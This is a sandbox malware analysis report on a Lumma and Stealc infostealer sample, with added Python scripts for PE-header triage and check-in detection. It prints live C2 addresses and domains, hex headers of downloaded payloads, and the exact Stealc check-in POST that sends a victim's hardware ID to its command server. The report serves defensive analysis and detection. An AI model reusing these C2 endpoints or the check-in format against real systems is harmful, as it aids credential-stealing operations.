Windows Analysis Report
s31ydU1MpQ.exe

Overview

General Information

Sample name: s31ydU1MpQ.exe
(renamed because the original name is a hash value)
Original sample name: d96503971b338f5b4db28e9f306a1fad.exe
Analysis ID: 1579679
MD5: d96503971b338f5b4db28e9f306a1fad
SHA1: 2b75e6f5537b01ae1fdc43fbc666b4cb300e50cc
SHA256: c1ddf685bda82f05dd6c3730103fcd0c7bba4d2ef14fcca5e57c622db31873b5
Tags: exe, user-abuse_ch

Detection

LummaC, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Classification chart (rendered as an image in the original report; only the labels survive here). Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Note: the Lumma traffic captured in this analysis (see Networking) carries a Chrome/119 browser user agent, not "TeslaBrowser/5.5", so that string alone is not a reliable detection anchor for this build.

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: s31ydU1MpQ.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: BGXAMSUR4L24WR8IH77.exe.484.11.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
Source: s31ydU1MpQ.exe.6440.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["sweepyribs.lat", "rapeflowwj.lat", "aspecteirs.lat", "necklacebudi.lat", "sustainskelet.lat", "grannyejh.lat", "energyaffai.lat", "crosshuaht.lat", "discokeyus.lat"], "Build id": "PsFKDg--pablo"}
Source: s31ydU1MpQ.exe Virustotal: Detection: 52%
Source: s31ydU1MpQ.exe ReversingLabs: Detection: 60%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Joe Sandbox ML: detected
Source: s31ydU1MpQ.exe Joe Sandbox ML: detected
Source: s31ydU1MpQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: HXPC21YC8H3Q6AWWXLQHI1I.exe, 0000000A.00000002.1716963563.0000000000B02000.00000040.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: number of queries: 1001

Networking

Source: Network traffic Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.7:61005 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.7:64113 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.7:61568 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.7:64003 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.7:49990 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.7:57623 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.7:64239 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.7:63520 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.7:61904 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49779 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49699 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49709 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49742 -> 104.21.66.86:443
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: sweepyribs.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 23 Dec 2024 06:28:44 GMT | Content-Type: application/octet-stream | Content-Length: 2845696 | Last-Modified: Mon, 23 Dec 2024 06:14:51 GMT | Connection: keep-alive | ETag: "6768ffdb-2b6c00" | Accept-Ranges: bytes
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 a0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2b 00 00 04 00 00 df 49 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 6e 72 78 65 63 62 76 00 e0 2a 00 00 a0 00 00 00 de 2a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6e 61 79 6a 72 67 79 00 20 00 00 00 80 2b 00 00 04 00 00 00 46 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2b 00 00 22 00 00 00 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 (all remaining captured bytes are 00)
  Decoded: PE32 (machine 0x14c, 6 sections) with section names "   " (three spaces), .rsrc, .idata, tnrxecbv, anayjrgy and .taggant; the last section's raw data ends at file offset 0x2b6c00 = 2845696 bytes, matching Content-Length and the ETag suffix. Caveat: as rendered here, the optional header is one 00 byte short just before AddressOfEntryPoint (its fields only line up if a 00 is restored there), so a parser fed this transcription will misread the entry point; the section table is intact.
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 23 Dec 2024 06:28:49 GMT | Content-Type: application/octet-stream | Content-Length: 2907648 | Last-Modified: Mon, 23 Dec 2024 06:16:47 GMT | Connection: keep-alive | ETag: "6769004f-2c5e00" | Accept-Ranges: bytes
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 90 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 4f 00 00 04 00 00 a0 28 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 77 77 71 75 66 6e 73 6b 00 c0 2a 00 00 c0 24 00 00 bc 2a 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 75 74 6a 71 6a 71 6e 00 10 00 00 00 80 4f 00 00 04 00 00 00 38 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4f 00 00 22 00 00 00 3c 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 (all remaining captured bytes are 00)
  Decoded: PE32 (machine 0x14c, 6 sections, link timestamp 0x67546419) with section names "   " (three spaces), .rsrc, .idata, wwqufnsk, dutjqjqn and .taggant; AddressOfEntryPoint 0x4f9000 falls inside .taggant, and the last section's raw data ends at file offset 0x2c5e00 = 2907648 bytes, matching Content-Length and the ETag suffix.
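Both responses above are PE downloads: the MZ and PE signatures and the section tables are visible in the raw bytes. The script below is an added example for this page, not part of the Joe Sandbox report or its tooling. It parses the header bytes of the second response, transcribed from the Data Raw above, and reproduces the static findings the report raises against the dropped files: non-standard section names, a whitespace-only section name ("PE file contains section with special chars"), RWX sections, and an entry point outside the standard sections. It also derives the minimum on-disk size from the section table to cross-check against Content-Length. The standard-section list and the "special character" rule are this example's own definitions, not Joe Sandbox's; the second response is used because its captured bytes parse consistently end to end.

```python
"""Static triage of the PE header captured in the second HTTP response above.

Added example, not part of the Joe Sandbox report. CAPTURED_HEX is transcribed
from the report's "Data Raw" capture: offsets 0x000-0x2cf (DOS header, Rich
header, COFF and optional headers, six section headers). The capture's trailing
00 padding is omitted because nothing parsed here lives there.
"""
import struct
from datetime import datetime, timezone

CAPTURED_HEX = """
4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 e8000000
0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f
74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000
208bb6d4 64ead887 64ead887 64ead887 0b9c7387 7cead887 0b9c4687 69ead887
0b9c7287 5eead887 6d925b87 67ead887 6d924b87 62ead887 e493d986 67ead887
64ead987 09ead887 0b9c7787 77ead887 0b9c4587 65ead887 52696368 64ead887
00000000 00000000 50450000 4c010600 19645467 00000000 00000000 e0000201
0b010a00 00960200 00280100 00000000 00904f00 00100000 00b00200 00004000
00100000 00020000 05000100 00000000 05000100 00000000 00c04f00 00040000
a0282d00 02004080 00001000 00100000 00001000 00100000 00000000 10000000
00000000 00000000 4db02400 61000000 00a02400 f0010000 00000000 00000000
00000000 00000000 f8b12400 08000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
20202000 20202020 00902400 00100000 00680100 00100000 00000000 00000000
00000000 400000e0 2e727372 63000000 f0010000 00a02400 00020000 00780100
00000000 00000000 00000000 400000c0 2e696461 74612020 00100000 00b02400
00020000 007a0100 00000000 00000000 00000000 400000c0 77777175 666e736b
00c02a00 00c02400 00bc2a00 007c0100 00000000 00000000 00000000 400000e0
6475746a 716a716e 00100000 00804f00 00040000 00382c00 00000000 00000000
00000000 400000e0 2e746167 67616e74 00300000 00904f00 00220000 003c2c00
00000000 00000000 00000000 400000e0
"""
CAPTURED = bytes.fromhex(CAPTURED_HEX)

# Both of these are this example's own policy, not Joe Sandbox's definitions.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT"}
MEM_EXECUTE, MEM_READ, MEM_WRITE = 0x20000000, 0x40000000, 0x80000000


def parse_pe32(data: bytes) -> dict:
    """DOS header -> e_lfanew -> COFF header -> PE32 optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_of_image, _headers_size, checksum = struct.unpack_from("<III", data, opt + 56)
    sections = []
    for i in range(nsections):  # 40-byte IMAGE_SECTION_HEADER entries follow the optional header
        off = opt + opt_size + 40 * i
        raw_name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": raw_name.split(b"\0", 1)[0].decode("latin-1"),
                         "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr,
                         "chars": struct.unpack_from("<I", data, off + 36)[0]})
    return {"machine": machine, "nsections": nsections, "timestamp": timestamp,
            "characteristics": chars, "entry_rva": entry_rva, "image_base": image_base,
            "size_of_image": size_of_image, "checksum": checksum, "sections": sections}


def triage(pe: dict) -> dict:
    """Reproduce the report's static findings from the parsed header."""
    secs = pe["sections"]
    ep = pe["entry_rva"]
    ep_sec = next((s for s in secs if s["va"] <= ep < s["va"] + s["vsize"]), None)
    rwx = MEM_EXECUTE | MEM_READ | MEM_WRITE
    return {
        "entry_section": ep_sec["name"] if ep_sec else None,
        "entry_in_standard_section": bool(ep_sec) and ep_sec["name"].strip() in STANDARD_SECTIONS,
        "non_standard_names": [s["name"] for s in secs if s["name"].strip() not in STANDARD_SECTIONS],
        # "special chars": an empty/whitespace-only name, or characters outside [A-Za-z0-9._$]
        "special_char_names": [s["name"] for s in secs if not s["name"].strip()
                               or not all(c.isalnum() or c in "._$" for c in s["name"].strip())],
        "rwx_sections": [s["name"] for s in secs if s["chars"] & rwx == rwx],
        # End of the last section's raw data is the minimum on-disk size; compare with Content-Length.
        "expected_file_size": max(s["rawptr"] + s["rawsize"] for s in secs),
    }


if __name__ == "__main__":
    pe = parse_pe32(CAPTURED)
    linked = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
    print(f"machine=0x{pe['machine']:x} sections={pe['nsections']} linked={linked:%Y-%m-%d %H:%M:%S} UTC")
    print(f"entry=0x{pe['image_base'] + pe['entry_rva']:08x} checksum=0x{pe['checksum']:x}")
    for s in pe["sections"]:
        print(f"  {s['name']!r:12} va=0x{s['va']:06x} raw=0x{s['rawptr']:06x}+0x{s['rawsize']:06x} "
              f"chars=0x{s['chars']:08x}")
    for key, value in triage(pe).items():
        print(f"{key}: {value}")
```

Running it shows the entry point resolving into .taggant (the "Entry point lies outside standard sections" finding), four of six sections mapped read/write/execute, and an expected file size of 0x2c5e00 = 2907648, which equals the Content-Length of the download. The CheckSum field is reported but can only be validated against the complete file, which the capture does not contain.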
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHC | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 30 34 46 44 41 38 36 38 45 37 33 30 39 39 33 30 35 32 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 2d 2d 0d 0a
  Data Ascii:
    ------JEBKKEGDBFIIEBFHIEHC
    Content-Disposition: form-data; name="hwid"

    AB04FDA868E73099305215
    ------JEBKKEGDBFIIEBFHIEHC
    Content-Disposition: form-data; name="build"

    stok
    ------JEBKKEGDBFIIEBFHIEHC--
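The POST above is the whole of what Stealc sends on first contact: a multipart body with exactly two fields, hwid and build, to a .php gate, with no User-Agent header (the report's "HTTP GET or POST without a user agent" finding), preceded by a bare GET / to the same host. The following is an added example, not part of the report and not the Suricata rule that fired: it reconstructs the two requests from the captured headers and the Data Ascii body (CRLF line endings are assumed, since the report prints the headers run together), parses the multipart form, and tags each request with a heuristic equivalent of the missing-user-agent finding and the Stealc check-in. The field-set rule in classify() is this example's own heuristic.

```python
"""Heuristic detection of the Stealc check-in request captured above.

Added example, not part of the Joe Sandbox report or of the Suricata rules it
cites. Both requests are reconstructed from the report's captured headers and
"Data Ascii" body; CRLF line endings are assumed. The field-set rule in
classify() is this example's own heuristic.
"""
import re

# Stealc first contact (report line: POST /c4becf79229cb002.php, Content-Length 211).
STEALC_CHECKIN = (
    b"POST /c4becf79229cb002.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHC\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------JEBKKEGDBFIIEBFHIEHC\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"AB04FDA868E73099305215\r\n"
    b"------JEBKKEGDBFIIEBFHIEHC\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"stok\r\n"
    b"------JEBKKEGDBFIIEBFHIEHC--\r\n"
)
# The bare GET / to the same host that precedes the check-in.
PROBE_GET = (
    b"GET / HTTP/1.1\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)


def parse_http_request(raw: bytes):
    """Split a raw request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Return {field name: value} for the form fields of a multipart/form-data body."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        raise ValueError("multipart/form-data without a boundary parameter")
    delimiter = b"--" + match.group(1).encode("latin-1")
    fields = {}
    for part in body.split(delimiter):
        if part.startswith(b"\r\n"):
            part = part[2:]
        if part.endswith(b"\r\n"):
            part = part[:-2]
        if not part or part.startswith(b"--"):  # preamble, or the closing "--" marker
            continue
        part_headers, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_headers)
        if name:
            fields[name.group(1).decode("latin-1")] = value.decode("latin-1")
    return fields


def classify(raw: bytes) -> list:
    """Tag a request with the findings the report raises for this traffic."""
    method, path, headers, body = parse_http_request(raw)
    tags = []
    if "user-agent" not in headers:  # "HTTP GET or POST without a user agent"
        tags.append("http-without-user-agent")
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("multipart/form-data"):
        fields = parse_multipart(body, ctype)
        # Heuristic for the Stealc check-in: exactly the hwid/build pair, posted to a .php gate.
        if set(fields) == {"hwid", "build"} and path.lower().endswith(".php"):
            tags.append("stealc-checkin")
    return tags


if __name__ == "__main__":
    for sample in (PROBE_GET, STEALC_CHECKIN):
        method, path, headers, body = parse_http_request(sample)
        print(method, path, classify(sample))
        if body:
            print("  fields:", parse_multipart(body, headers["content-type"]))
```

The build value stok is the same string the configuration extractor reports as "Botnet" in the AV Detection section, so the static config and the observed traffic corroborate each other; the hwid value is the per-victim identifier and is the field to pivot on when correlating sessions from the same host.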
Source: Joe Sandbox View IP Address: 104.21.66.86
Source: Joe Sandbox View IP Address: 23.55.153.106
Source: Joe Sandbox View IP Address: 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
